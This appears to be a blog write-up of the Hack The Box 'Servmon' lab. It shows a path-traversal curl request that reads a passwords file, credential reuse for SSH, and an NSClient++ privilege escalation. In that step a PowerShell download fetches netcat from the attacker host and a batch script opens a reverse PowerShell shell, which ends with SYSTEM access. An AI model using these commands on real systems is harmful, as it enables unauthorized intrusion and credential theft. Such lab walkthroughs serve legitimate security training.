Hackthebox – Servmon

As with any box, Servmon also gets some port scans.

root@kalivm:~/Servmon# nmap -oN fullscan-A -A 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 09:24 CEST
Nmap scan report for 10.10.10.184 (10.10.10.184)
Host is up (0.081s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     refox/68.0
|_    ":{"context":"ini://${shared-
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=5/30%Time=5ED20A4C%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe
SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\
SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra
SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm
SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s
SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w
SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20
SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPOption
SF:s,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-
SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb
SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr
SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti
SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\
SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script
SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window
SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr
SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,1B4
SF:,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Lengt
SF:h:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf<
SF:!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transit
SF:ional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\
SF:.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r\n<h
SF:ead>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\x20t
SF:ype=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loc
SF:ation\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</script>\
SF:r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,65
SF:,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=5/30%Time=5ED20A53%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\nrefox/68\.0\0\0\0\0\0\0\0\0\x8f\x01\0\0\x04\0\
SF:0\0\0\0\0\":{\"context\":\"ini://\${shared-")%r(HTTPOptions,36,"HTTP/1\
SF:.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(
SF:FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\n
SF:Document\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nConten
SF:t-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36,"HTTP
SF:/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/30%OT=21%CT=1%CU=36972%PV=Y%DS=2%DC=T%G=Y%TM=5ED20AC
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%TS=U)SEQ(SP=1
OS:08%GCD=1%ISR=109%TI=I%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4
OS:=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF
OS:%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF
OS:=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%
OS:Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A
OS:%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y
OS:%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR
OS:%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-30T07:30:33
|_  start_date: N/A

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   13.19 ms  10.10.14.1 (10.10.14.1)
2   428.93 ms 10.10.10.184 (10.10.10.184)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.16 seconds

So ports that are interesting are 21, with anonymous FTP, 22 on a windows box?! 80, the web server obviously and 8443 looks interesting too, no clue yet what it is though. Lets first start with the FTP server.

root@kalivm:~/Servmon# ncftp 10.10.10.184
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.184...                                                                                                          
Microsoft FTP Service
Logging in...                                                                                                                          
User logged in.
Logged in to 10.10.10.184.                                                                                                             
ncftp / > dir 
d---------   1 ftpuser  ftpusers            0 Jan 18 12:05 Users
ncftp / > dir Users
d---------   1 ftpuser  ftpusers            0 Jan 18 12:06 Nadine
d---------   1 ftpuser  ftpusers            0 Jan 18 12:08 Nathan
ncftp / > dir Users/Nadine
----------   1 ftpuser  ftpusers          174 Jan 18 12:08 Confidential.txt
ncftp / > dir Users/Nathan
----------   1 ftpuser  ftpusers          186 Jan 18 12:10 Notes to do.txt

So the server contains a Users directory for Nathan and Nadine, and both directories contain one txt file.

root@kalivm:~/Servmon# cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Not too interesting, apparently Nathan has changed the password for NVMS and locked down NSCLient access, lets take a look at the Confidential file

root@kalivm:~/Servmon# cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Ok, so there is a passwords.txt file on Nathan’s desktop… not yet sure what I can do with that, but good to keep in mind. Lets look further
servmon's NVMS1000
On the webserver, NVMS1000 is hosted

root@kalivm:~/Servmon# searchsploit nvms 1000
----------------------------------- ---------------------------------
 Exploit Title                     |  Path
----------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal    | hardware/webapps/47774.txt
TVT NVMS 1000 - Directory Traversal| hardware/webapps/48311.py
----------------------------------- ---------------------------------

A quick search on searchsploit shows that NVMS may be vulnerable to Path traversal, this may be interesting to combine with that Passwords.txt file since Nathan’s note said he had not yet uploaded the passwords or put the secret file in SharePoint!

root@kalivm:~/Servmon# curl --path-as-is http://10.10.10.184/../../../Users/Nathan/Desktop/Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

And there we have some passwords we can now try out! After using Metasploit’s smb_login scanner to see if there were any valid credentials, it appeared that L1k3B1gBut7s@W0rk is Nadine’s password, but that did not get me much further on the fileshares since there were none. However, there are more services to try it on.

root@kalivm:~/Servmon# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON c:\Users\Nadine>type Desktop\user.txt
17c689b81<NOFLAG>50a358e02cc96ce

The password worked for the SSH connection too and there we have the flag!

Privilege Escalation

But we’re no Administrator yet, so its time for privilege escalation. After some looking around, I found that there’s a NSClient++ tool installed. It did not work all that well using firefox, so I started Chromium to check it and it kinda worked.
servmon's nsclient
However, I did not yet have a password, but did find this exploit on exploitDB on how to get it using the commandline, which also was mentioned in the UI under ‘forget password’

nadine@SERVMON C:\Users\Nadine>cd "c:\Program Files\NSClient++"

nadine@SERVMON c:\Program Files\NSClient++>type nsclient.ini
----snip----
; Undocumented key                                                                                                                     
password = ew2x6SsGTxjRwXOT                                                                                                            
                                                                                                                                       
; Undocumented key                                                                                                                     
allowed hosts = 127.0.0.1
----snip----

Wait, so the allowed hosts setting is limited to 127.0.0.1, that must be the access Lockdown Nathan had in his Todo File. It means I need a tunnel to that machine so lets restart the ssh connection to do so.

root@kalivm:~/Servmon# ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd "c:\Program Files\NSClient++"
nadine@SERVMON c:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

After using the password display command, it showed the same password so that must be it. After logging into the web UI, I could not really get it to work the way I wanted and got stuck for a while. After asking on Discord for a little nudge, someone told to go through the API instead, and after reading some of the API documentation, that appeared to be easy. So I downloaded netcat to Servmon and prepared a batch file locally.

nadine@SERVMON C:\Users\Nadine>powershell IWR -uri http://10.10.15.30:8000/windows/nc.exe -outfile c:\Temp\nc.exe

root@kalivm:~/Servmon# cat sedje.bat 
@echo off 
c:\Temp\nc.exe 10.10.15.30 9000 -e powershell
root@kalivm:~/Servmon# curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/sedje.bat --data-binary @sedje.bat
Enter host password for user 'admin':
Added sedje as scripts

I added the script and had to start a listener and restart the service, after browsing to the Queries screen in the web interface, the connection came in.

root@kalivm:~/~# nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.184 50975
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Program Files\NSClient++>whoami
whoami
nt authority\system

And there I have a shell as nt authority\system. Now all that is left, is to get the flag

PS C:\Program Files\NSClient++> cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       30/05/2020     09:39             34 root.txt


PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
c9fd74d2e<NOFLAG>28d140be18e8a97

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.